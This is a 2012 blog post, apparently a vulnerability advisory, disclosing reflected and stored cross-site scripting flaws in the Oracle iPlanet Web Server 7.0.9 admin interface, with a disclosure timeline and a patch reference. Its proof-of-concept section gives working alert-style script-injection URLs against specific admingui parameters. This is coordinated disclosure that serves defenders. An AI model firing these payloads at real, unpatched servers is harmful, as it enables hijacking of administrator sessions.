Sunday, April 29, 2012

Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Description
Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Oracle iPlanet Web Server. These issues were discovered in a default installation of Oracle iPlanet Web Server 7.0.9. Other earlier versions may also be affected.


Proof of concept
Reflected XSS
===========
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--></style></script><script>alert(/XSS/)</script>&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight='"--></style></script><script>alert(/XSS/)</script>&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth='"--></style></script><script>alert(/XSS/)</script>

Stored XSS
=========
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName='"--></style></script><script>alert(/Stored XSS 1/)</script>&helpFile=&pathPrefix=
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix='"--></style></script><script>alert(/Stored XSS 2/)</script>

To trigger Stored XSS:
=================
http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=TESTING&helpFile=&pathPrefix=

Solution
Oracle has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS
Secunia: http://secunia.com/advisories/43942/

Disclosure Timeline
2011-03-29 - Vulnerabilities discovered.
2011-03-29 - Vulnerabilities reported to Secunia.
2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.
2012-04-17 - Patch released.
2012-04-18 - Advisory published by Secunia.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.